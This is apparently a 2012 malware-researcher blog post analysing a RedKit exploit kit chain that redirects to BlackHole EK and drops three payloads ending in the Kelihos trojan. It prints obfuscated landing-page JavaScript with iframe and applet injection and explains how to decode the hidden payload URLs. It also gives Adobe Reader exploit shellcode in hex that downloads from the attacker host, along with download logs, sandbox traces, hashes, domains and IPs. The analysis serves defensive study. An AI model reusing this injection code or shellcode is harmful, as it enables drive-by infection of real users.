What happened if Red Kit Exploit Kit team up with BlackHole EK? = Tripple payload + infection of Khelios!
30 Dec 2012 It is the last crusade of the year 2012, crusade was started by the lead of RedKit. We heard that RedKit is going into a heavy customization, so it is good for the new year's adventure as the "different"challenge than BHEK.Sadly, I am in hospital writing this, on duty of waiting for my Dad to be transferred to other place, so I just depend on my Note PC to do analyze this, please bear these initial result, I will add it with binary analysis details after new year. Unfortunately, this case is longer than I expected, indeed it is good to kill my waiting time.
So here we go, the RedKit Exploit Kit to BHEK with tripple payload downloads case, ending up with Khelios :-)
Infector URL:
h00p://optik-welter.de/hcwf.htmusing the google as referer+IE java headers, we fetched it:
--17:58:21-- h00p://optik-welter.de/hcwf.htmlet's see the insides:
=> `hcwf.htm'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /hcwf.htm HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie painted your front door *pink*
Accept: */*
Host: optik-welter.de
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 08:58:22 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Content-Length: 12996
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
17:58:23 (41.24 KB/s) - `hcwf.htm' saved [12996/12996]
<html><body><td>Ydoanunan onontothmeiun we i de idedovoitthcode..↑We see the plugin detect old version (0.7.7) modified for the evil purpose.. In the plugin detect script we can easily see some suspicious malware infector downloads urls like:
ive="h00p://optik-welter・de/332.jar" code="Runs.class"><param n..
obapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f..
bapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4..
apoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36l..
pophwlllobapop"></applet><applet archive="h00p://optik-welter.d..
ame="elitken" value="lv9llobapopm0kllobapopt0vllobapophczllobap..
gllobapopezlllobapopdi1llobapop.l8llobapoprp1llobapope3pllobapo..
llobapop-iallobapopkkdllobapopi3kllobapoptyillobapoppydllobapop..
lobapoppdallobapopt82llobapoptlcllobapophk5llobapop"></applet>..
var jsou = "src";
var cxhy=document.createElement("iframe");
function dettq()
{
document.body.appendChild(cxhy);
cxhy.setAttribute(jsou,"h00p://optik-welter・de/
}
var Ganni={version:"0.7.7",rDate:"04/11/2012",n..
eturn function(){c(b,a)}},isDefined:function(b){return typeof b ..
turn(/array/i).test(Object.prototype.toString.call(b))},isFunc:..
n"},isString:function(b){return typeof b=="string"},isNum:funct..
trNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},g..
egx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)..
umRegx).exec(b):null;return a?a[0]:null},compareNums:function(h..
:
: (snipped)
:
Ganni.initScript();
flopp=Ganni.getVersion("AdobeReader");
if(flopp)
{
flopp=flopp.split(',');
if (((3+1) > flopp[1] && (8+1)==flopp[0]) || ((2+1) > flopp[1] && (7+1)==flopp[0]))
{
cxhy.setAttribute("width",4);
cxhy.setAttribute("height",12);
dettq();
}
}</script></body></html>
h00p://optik-welter.de/332.jar↑It is good to try to download these, go ahead to try, but I prefer to go straightly to payload.
h00p://optik-welter.de/887.jar
h00p://optik-welter.de/987.pdf
The Sharing of RedKit EK Infector Source/Code
The complete landing page HTML code is pasted here -->>[PASTEBIN]The plugin detect 0.7,7 code is in here -->>[PASTEBIN]
Guide to Crack the RedKit Landing Page Code (to fetch the 1st payload)
In the landing page there's the applet code that can lead us to the payload. The below applet code is one of the key to fetch payload:<applet archive="h00p://optik-welter.de/332.jar" code="Runs.class">let's take the parameter elitken's value:
<param name="elitken" value="lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgqllobapophwlllobapop">
</applet>
lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0You see the the repetition of "llobapop" strings? It is actually a delimiter.
llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwa
llobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmk
llobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgq
llobapophwlllobapop
So let's start eliminate them, then we get below sets of garbled words:
lrk m0i tde hh0 .qv 3yt 3kz /f0 e8x dxq .hk rxk ey5 trr lwaTo decode this, we noticed the simple trick by taking the first character in each words & gather those first character backward, we'll get the download url:
e5i wg4 -ad kyy il8 tg9 pmk o2t /lr /ol :36 px2 t4g tgq hwl
h00p://optik-welter.de/33.html
Payload 1
The above url is actually a payload's url. 33.html is actually a php script to feed you with payload binary file setup.exe, as per below PoC:@unixfreaxjp /malware]$ myfetch h00p://optik-welter.de/33.html↑Yes it is a binary file, was set to be "setup.exe". I will do the binary analysis later, but let me explain what this malware does after executed into your system:
--18:16:43-- h00p://optik-welter.de/33.html
=> `33.html'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /33.html HTTP/1.0
Referer: h00p://www.google.com/..
User-Agent: #MalwareMustDie is hammering your door with nails.
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: optik-welter.de
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 09:16:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 41472
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/octet-stream
:
200 OK
18:16:46 (37.76 KB/s) - `33.html' saved [41472/41472]
@unixfreaxjp /malware]$ ls -alF 33.html
-rwxr--r-- 1 rik wheel 41472 Dec 30 18:16 33.html*
@unixfreaxjp /malware]$ mycheckbin ./33.html
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 07 00 5C 82 DF 50 00 00 00 00 PE..L......P....
: : :
snipped....snipped..
1. After injecting malicious code into another process:
0xdc setup.exe2. It tried connecting to the below malware domains:
0x348 svchost.exe
a-wing.com.ar3. Each connected domains will be requested HTTP/GET:
girasoles-web.com.ar
hsd-transport.com
amcarlosbarrios.es
littleowlletterpress.com
beach-hotel-andalusia.com
jastreb.hr
gyneco-saint-andre.fr
aliyahraks.com
tvmarinaresort.com
a-wing.com.ar GET /h.htm HTTP/1.1↑these requests are rapidly queried, I counted in my machine within 90sec it requested 22,000 requests!
girasoles-web.com.ar GET /g.htm HTTP/1.1
hsd-transport.com GET /g.htm HTTP/1.1
amcarlosbarrios.es GET /m.htm HTTP/1.1
littleowlletterpress.com GET /v.htm HTTP/1.1
beach-hotel-andalusia.com GET /x.htm HTTP/1.1
jastreb.hr GET /c.htm HTTP/1.1
gyneco-saint-andre.fr GET /y.htm HTTP/1.1
aliyahraks.com GET /u.htm HTTP/1.1
tvmarinaresort.com GET /o.htm HTTP/1.1
4. Upon connected you will be redirected to BHEK↓
--20:26:56-- h00p://beach-hotel-andalusia.com/x.htmAfter being redirected few times, we arrived at wufjajcy.ru to fetch 1.php file. This 1.php file is the BHEK landing page.
=> `x.htm'
Resolving beach-hotel-andalusia.com... seconds 0.00, 213.175.208.2
Caching beach-hotel-andalusia.com => 213.175.208.2
Connecting to beach-hotel-andalusia.com|213.175.208.2|:80... seconds 0.00, connected.
:
GET /x.htm h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: beach-hotel-andalusia.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
h00p request sent, awaiting response...
:
h00p/1.1 301 Moved Permanently
Content-Length: 239
Content-Type: text/html
Location: h00p://linsubby.ru/count4.php
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Dec 2012 11:27:02 GMT
Connection: close
:
301 Moved Permanently
Location: h00p://linsubby.ru/count4.php [following]
--20:26:57-- h00p://linsubby.ru/count4.php
=> `count4.php'
Resolving linsubby.ru... seconds 0.00, 31.207.231.141
Caching linsubby.ru => 31.207.231.141
Connecting to linsubby.ru|31.207.231.141|:80... seconds 0.00, connected.
:
GET /count4.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: linsubby.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
h00p request sent, awaiting response...
:
h00p/1.1 302
Server: Apache
Content-Length: 0
Content-Type:
Last-Modified: ┬±, 30 ΣσΩ 2012 11:27:01 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 30 Dec 2012 11:26:59 GMT
X-Powered-By:PHP/5.3.2
Location:h00p://wufjajcy.ru/links/1.php
:
302
Location: h00p://wufjajcy.ru/links/1.php [following]
Closed fd 1896
--20:27:00-- h00p://wufjajcy.ru/links/1.php
=> `1.php'
Resolving wufjajcy.ru... seconds 0.00, 184.82.27.102
Caching wufjajcy.ru => 184.82.27.102
Connecting to wufjajcy.ru|184.82.27.102|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d6548 (new refcount 1).
:
GET /links/1.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: wufjajcy.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 11:27:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.18
:
200 OK
Length: unspecified [text/html]
20:27:17 (6.67 KB/s) - `1.php' saved [92673]
The Sharing of BHEK Infector Resources/Code
The BHEK landing page HTML code is here--->>[PASTEBIN]
The decoded BHEK PluginDetect 0.7.9 is here -->>[PASTEBIN]
(Please read our previous post about BHEK for the guidance to decode)
The BHEK was weaponized for ONLY dropping the PDF at the function p1:function p1(){As per explained before, let's use THEIR function to crack their code:
var d = document.createElement("object");
d.setAttribute("data", "/links/1.php?dcdjf=" + x("c833f") + "&nybnj=" + x("cqk") +
"&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);}var a=x("TYPE-THE-STRING-HERE");Which lead us to the download url of:
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i)).toString(33);
d.push(k); } ; return d.join(":");}
document.write(a);/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1fWrapped it with the BHEK domain name and download it:URL: h00p://wufjajcy.ru/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1fThe downloaded file is actually a PDF file, contains evil JavaScript.
GET /links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: I am speachless seeing how fool your codes are - #MalwareMustDie
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 12:18:46 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Content-Length: 21419
ETag: "834215633845d4bc9d54eff04e9f149b"
Last-Modified: Sun, 30 Dec 2012 12:19:11 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,419 (21K) [application/pdf]
21:18:45 (9.04 KB/s) - `1.php@dcdjf' saved [21419/21419]
That code is at 0x48D; I made GUIDE to crack & analyze it here--->>[PASTEBIN]
The usage of Adobe Reader exploit codes of(1) Collab.getIcon Exploit CVE-2009-0927 , and (2) Collab.collectEmailInfo CVE-2007-5659↑clearly stated in the guide that exploit was used - to execute the obfuscated shellcode strings, which in HEX can be viewed as per below:66 83 e4 fc fc 85 e4 75 34 e9 5f 33 cO 64 8b 4O f......u4._3.d.@
3O 8b 4O Oc 8b 7O 1c 56 8b 76 O8 33 db 66 8b 5e [email protected].^
3c O3 74 33 2c 81 ee 15 1O ff ff b8 8b 4O 3O c3 <.t3,........@O.
46 39 O6 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78 O3 f5 56 8b 76 2O O3 f5 V.u<.t5x..V.v...
33 c9 49 41 fc ad O3 c5 33 db Of be 1O 38 f2 74 3.IA....3....8.t
O8 c1 cb Od O3 da 4O eb f1 3b 1f 75 e6 5e 8b 5e ......@..;.u.^.^
24 O3 dd 66 8b Oc 4b 8d 46 ec ff 54 24 Oc 8b d8 $..f..K.F..T$...
O3 dd 8b O4 8b O3 c5 ab 5e 59 c3 eb 53 ad 8b 68 ........^Y..S..h
2O 8O 7d Oc 33 74 O3 96 eb f3 8b 68 O8 8b f7 6a ..}.3t.....h...j
O5 59 e8 98 ff ff ff e2 f9 e8 OO OO OO OO 58 5O .Y............XP
6a 4O 68 ff OO OO OO 5O 83 cO 19 5O 55 8b ec 8b [email protected]...
5e 1O 83 c3 O5 ff e3 68 6f 6e OO OO 68 75 72 6c ^......hon..hurl
6d 54 ff 16 83 c4 O8 8b e8 e8 61 ff ff ff eb O2 mT........a.....
eb 72 81 ec O4 O1 OO OO 8d 5c 24 Oc c7 O4 24 72 .r.......\$...$r
65 67 73 c7 44 24 O4 76 72 33 32 c7 44 24 O8 2O egs.D$.vr32.D$..
2d 73 2O 53 68 f8 OO OO OO ff 56 Oc 8b e8 33 c9 -s.Sh.....V...3.
51 c7 44 1d OO 77 7O 62 74 c7 44 1d O5 2e 64 6c Q.D..wpbt.D...dl
6c c6 44 1d O9 OO 59 8a c1 O4 3O 88 44 1d O4 41 l.D...Y...O.D..A
51 6a OO 6a OO 53 57 6a OO ff 56 14 85 cO 75 16 Qj.j.SWj..V...u.
6a OO 53 ff 56 O4 6a OO 83 eb Oc 53 ff 56 O4 83 j.S.V.j....S.V..
c3 Oc eb O2 eb 13 47 8O 3f OO 75 fa 47 8O 3f OO ......G.?.u.G.?.
75 c4 6a OO 6a fe ff 56 O8 e8 9c fe ff ff 8e 4e u.j.j..V.......N
Oe ec 98 fe 8a Oe 89 6f O1 bd 33 ca 8a 5b 1b c6 .......o..3..[..
46 79 36 1a 2f 7O 68 74 74 7O 3a 2f 2f 77 75 66 Fy6./phOOp://wuf
6a 61 6a 63 79 2e 72 75 2f 6c 69 6e 6b 73 2f 31 jajcy.ru/links/1
2e 7O 68 7O 3f 7a 65 67 71 71 7a 68 3d 33 3O 3a .php?zegqqzh=3O:
31 6e 3a 31 69 3a 31 69 3a 33 33 26 75 77 75 63 1n:1i:1i:33&uwuc
3d 31 6a 3a 31 6e 3a 31 6d 3a 31 6c 3a 31 6d 3a =1j:1n:1m:1l:1m:
32 77 3a 33 31 3a 31 6a 3a 31 6d 3a 31 67 26 63 2w:31:1j:1m:1g&c
6e 77 3d 31 68 26 6b 72 61 63 3d 6b 66 78 69 26 nw=1h&krac=kfxi&
7a 61 67 6f 3d 6d 71 73 71 6a 78 77 67 OO OO OO zago=mqsqjxwg...Payload 2
In the bottom of the HEX code you can see the payload url :-) let's fetch it:URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwgAnother payload, calc.exe, so be it. This calc.exe will self-deleted+copied to:
GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie is taking a break... running out of paint..
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 13:11:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Pragma: public
Expires: Sun, 30 Dec 2012 13:12:19 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 23040
---response end---
200 OK
Length: 23,040 (23K) [application/x-msdownload]
100%[=================> ] 23,040 3.49K/s ETA 00:00
22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]%System%\ntvdm.exeAnd run by CMD to start these processes:0x348 svchost.exeAnd then requesting connection to these random domains:
0x420 svchost.exe
0x7e4 ntvdm.exe
0x7e4 ntvdm.exe
0x7e4 ntvdm.exeThe domain & IP info of calc.exe:
cucaklif.ru
worgukiw.ru
oqivynle.ru
voxyqjyc.ru
qysriloh.ru
lymurufa.ru
ektizzab.ru
batycfac.ru
akmaxook.ru
nosgazim.ru
nopepkaq.ru
lofibvar.ru
lejbomor.ru
yficebnu.ru
tyjkexax.ru
:
(and maybe others after getting some chance to analyze the binary)wufjajcy.ru A 184.82.27.102
wufjajcy.ru NS ns1.larstor.com
wufjajcy.ru NS ns2.larstor.com
wufjajcy.ru NS ns3.larstor.com
wufjajcy.ru NS ns4.larstor.com
wufjajcy.ru NS ns5.larstor.com
wufjajcy.ru NS ns6.larstor.comPayload 3
This calc.exe is downloading another malware file "newbos2.exe" via HTTP GET command, with PoC:--22:21:21-- h00p://cucaklif.ru/newbos2.exeA quick sandbox analysis is:
=> `newbos2.exe'
Resolving cucaklif.ru... seconds 0.00, 37.19.146.142
Caching cucaklif.ru => 37.19.146.142
Connecting to cucaklif.ru|37.19.146.142|:80... seconds 0.00, connected.
:
GET /newbos2.exe HTTP/1.0
Accept: */*
Host: cucaklif.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 763904
Content-Type: application/octet-stream
Last-Modified: ┬≥, 01 φΓ 2002 02:16:15 GMT
Accept-Ranges: bytes
200 Ok
Length: 763,904 (746K) [application/octet-stream]
100%[===================================> ] 763,904 7.06K/s ETA 00:00
22:31:13 (1.26 KB/s) - `newbos2.exe' saved [763904/763904]// SELF-EXECUTED...
PId: 0x4ac
Image Name: C:\newbos2.exe
API:
CreateServiceA(hSCManager: 0x157048,
lpServiceName: "NPF",
lpDisplayName: "WinPcap Packet Driver (NPF)",
dwDesiredAccess: 0xf01ff,
dwServiceType: 0x1,
dwStartType: 0x3,
dwErrorControl: 0x1,
lpBinaryPathName: "system32\drivers\NPF.sys",
lpLoadOrderGroup: "(null)",
lpdwTagId: 0x0,
lpDependencies: 0x0,
lpServiceStartName: "(null)",
lpPassword: 0x0)
// REGISTRY...
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SonyAgent
REG_SZ 38 "C:\newbos2.exe"
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ContextChangedCurrent
REG_SZ 138 "DMaWNZ4Ku1rL7IDJKR1RYFEEIRwBnxpmODxxvk5HaMX2C4K67X6Jyj7poL8MPRl87w=="
HKLM\System\CurrentControlSet\Services\NPF\DisplayName
REG_SZ 56 "WinPcap Packet Driver (NPF)"
LM\System\CurrentControlSet\Services\NPF\ImagePath
REG_EXPAND_SZ 50 "system32\drivers\NPF.sys"
//SOME DROPS....
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\wpcap.dll
//STARTING SERVICE: WinPcap Packet Driver (NPF) up...
CreateServiceA(hSCManager: 0x157048,
lpServiceName: "NPF",
lpDisplayName: "WinPcap Packet Driver (NPF)",
dwDesiredAccess: 0xf01ff,
dwServiceType: 0x1,
dwStartType: 0x3,
dwErrorControl: 0x1,
lpBinaryPathName: "system32\drivers\NPF.sys",
lpLoadOrderGroup: "(null)",
lpdwTagId: 0x0,
lpDependencies: 0x0,
lpServiceStartName: "(null)",
lpPassword: 0x0)
// SUSPICIOUS HTTP querry:
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ez\xec\x85ez\xfc\x85ez-\x8bez\"\x8aez2\x8bez\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1H\xffP\xb3\xf6\xec]\x0fd\x97\xdd\x85\x93W\xa2;Xo\x82\x11k\x05\x9b\xf1\xe7:|\xd3\xf98\x88\xc8\x8e\xfdf\x0f\xe2\xcbs\xf0\x07\xa31\x99\x1f\x9ee@\x01R\x91\x1d\xc80>t\xdf-L\xe6\x1d\xa2\x0f\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1Hso\xc8\xe5\xb0\xc8A\x11\xc6L\xea\xb0\x04\x13\xa5\x83}^`8Dp\xcd
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezg\x86ezw\x86ez\xa8\x8bez\x9d\x8aez\xad\x8bez\xad=P\xdf\tj\x86\xf7\x8b\x10>\x18BA\x9b\x90\xd5\xe3\xc0\xec\xb5_N\xb6\xe3\x92\vkL\x86\xb8\x02\xe3\x9dH\x1c\x88\x82<!b\x94E
\x9e\x85ezc\x86ezs\x86ez\xa4\x8bez\x99\x8aez\xa9\x8bez\xa7\x91\xb4\xed\xa3RW#\"p\x87)P\xd4\x98\xb3\x99\x1a\x869\x1dGo\xf2B\xdc\x9e\x97\xdb\x07\x9e\x85ez\xf1\x85ez\x01\x86ez2\x8bez'\x8aez7\x8bez\xfa\x9f\xb1\xb0p:\xd2\xcax\xf7\xe2bO\xd1e\xf2\x84{\x05\xcf\x18B\xde\xa8\\\xad\xe6\xcf\x8bR\xae\xc9\x1c:J\xab\xe4\xf1\xeb\xf8\x98\\\xd4\xeb\rjE\xcfM\xae\xe6\xcd\xf6\xfbo\xc9\x1c\x9c\xec\xaa\xb8
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezQ\x86eza\x86ez\x92\x8bez\x87\x8aez\x97\x8bez\xeav>HN\xec\x8d\xe3I\x8f\xd3\x9br(\xba\x99\x86c\xd9\xb6kB\x9ab\xa3-\\\x1f\xe0\xb1\x88\xb8\xc3)\vg\xech^P+1\xe9\xdf\xa8\x1a(\xe3\xe5\xe2\xe2\x07\"K\xa8Jx
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezV\x86ezf\x86ez\x97\x8bez\x8c\x8aez\x9c\x8bez\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb2$S\xe9\xb8\x13\xc9\x94\xcb\xb46\x83\x85\xa9\x191.\\?B\xe9\x97X\xf5\xf0+\xe2Oq\x04b\xc8#!N:\xe5\x04\x89\xfe\x87\xc6\xa2[\x85\bU\xda\xeb\x8a_\x80\xf3\x1a\xeb\x95\tn\xb8\xf0\xe1\xda\x9d\xcf\xca\x88Z\xd6\x92\xf3\x03\xef:R\x04\xc4e~\x9ct*=\x92\x93\x15\xc3U\x91\x1d\xe5:F\xaa\x0c\xe6$b\xd3+\xc8\xa7\xe7\x1e)\b\xfe\x0cC5\x852ca9#nz]\xdd\xe5\xf9\xaf\x1a)h\x98\xaa6\xa8\x12\xb9p\xbdfj\xbe\x89\xb8~\b\xc6\xb3\xc4\xe4\x86\xfd\xdcC\xc6&\xff\x9c\xc9\x96\x1e(E>j\x88\xdce$r\x93\x97\x98\xf2\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb\x8dEIu\xb8'htt\xa6\xb2\x97\xec\x91\xcf\xcd\x9e\x85
\x9e\x85ez\xee\x85ez\xfe\x85ez/\x8bez$\x8aez4\x8bez\x07C\x12\xa3d\xb1J\xcfh\xcaI8u=\xb0\x03\xe09ak\xa6R.\xc4\r\x12\xadWN\x82
\x9e\x85ez\xfc\x85ez\x0c\x86ez=\x8bez2\x8aezB\x8bez\x0eqd\xf3\rV\xb3\xed\xfa\x1a\xabN\r\xf1CH\x17rX\x1c\xea\xd5\xb2P\\\xb8\xf1\xfd\\\x9d\xa7\"i\x18\xba6\xb9q\xb9\x05\x80\xc6m\xafO\xb4\xfa\x98\xb9&)Rh\xb8\xff|\xf8\x82\x9a'\x0e\x01\xefAz\t\"{\xaf#\xa9D\t \x97\x94\xe2\x06\xeb\xf8]`=\xe6\x0c\xd81\x1f\xc2q
\x9e\x85ez/\x86ez?\x86ezp\x8beze\x8aezu\x8bez\xd9Ji$g\xa0\xdb\x80\x99\x99\x85U\xa1\xf4?\xddA\x1b\x1fcc)\xb0\x17\xab\x04\xbf\x94\xd0\xc6\x1e\xd0\x88\xb3J\v'5j\x95ON\x9fo/\xfd\xe5',\xc2
\x9e\x85ez\xfb\x85ez\v\x86ez<\x8bez1\x8aezA\x8bez\xf3\xba\xf3\xedGF\xbc]\xef(\xe8u4\x91\x1fWQ\x80\x0c`\xdf0\xbe\xb9\xf0\xa4\x05E\xf6%\xc6\x10U\xff\x0e0\x17\x14\xdfuO\xd3\x0e\x91\xc2\x1d+\x1d\xd9\xa2\xcfma\xe3{\x1a\x9aZ/c5\xffD\xdf\x07G`\xe7n\xd9w\xd9\xf5%\xfdB\x19O\x80:\x81\xd5\xbb\xa8x.\x03Y!\x11gU\xb5\xf3\xba\xf3\xedGF\xbc]\xef(\xe8u4\x91\x1fWp\xf5M\x98S\x15\xd7\xf3?q\xc1u\x9f\xbc\xda|\xeb\xd5%\x9aJ\x8b\xbb7\x1c\xc4cQ\x87\xe8Ua\xadh1\xd8\x90\x11>\x89\xc1\"$\xe5K\xb65X^\xe3\x82\xef\xadd\x13\b-\x99\x84\\n\x19\xe4\xbbD>u
// EXECUTED THREAD PROCESSES..
0x2b0 lsass.exe
0x3f4 svchost.exe
// LOADING MODULE...
C:\WINDOWS\system32\wbem\wbemcons.dll by PID:0x3f4 (svchost.exe)Virus Total Report
RedKit EK landing page - hcwf.htm 942641ec71e352d531805ed1082d6056 (0/44)BHEK landing page - 1.php a66429f2424a3824a9eb054a9084cf5b (3/46)RedKit Downloaded Troj1- setup.exe dc042fd30376f2f056ab3851be6190c7 (15/43)RedKit Downloaded Troj2- calc.exe 42a4de1001682f27ad55c893af9bd23d (12/46)BHEK PDF Trojan Downldr- sample3.pdf d68baa5a947cd84c993f6c5b972f6708 (22/46)Final Trojan Khelios - newbos2.exe 476f829bc53228c303331aa1f783f7f0 (12/46)URL Query Report
Samples
:-) Here's the download url (for the research purpose only!) -->>[MEDIAFIRE]Infector Domain Analysis
The Khelios Domain & Historical IP Information:cucaklif.ru A 5.79.227.65(you can get more infector domains by tracing ↑these IP) The DNS Server used for the Khelios Payload .RU domains:
cucaklif.ru A 77.106.119.105
cucaklif.ru A 88.206.64.69
cucaklif.ru A 89.221.113.36
cucaklif.ru A 95.104.102.82
cucaklif.ru A 159.148.124.172
cucaklif.ru A 177.199.108.51
cucaklif.ru A 178.137.235.238
cucaklif.ru A 188.19.160.215
cucaklif.ru A 202.122.63.80
cucaklif.ru A 203.80.126.186
worgukiw.ru A 14.97.222.104
worgukiw.ru A 24.14.110.124
worgukiw.ru A 27.188.153.72
worgukiw.ru A 37.229.235.32
worgukiw.ru A 46.109.154.27
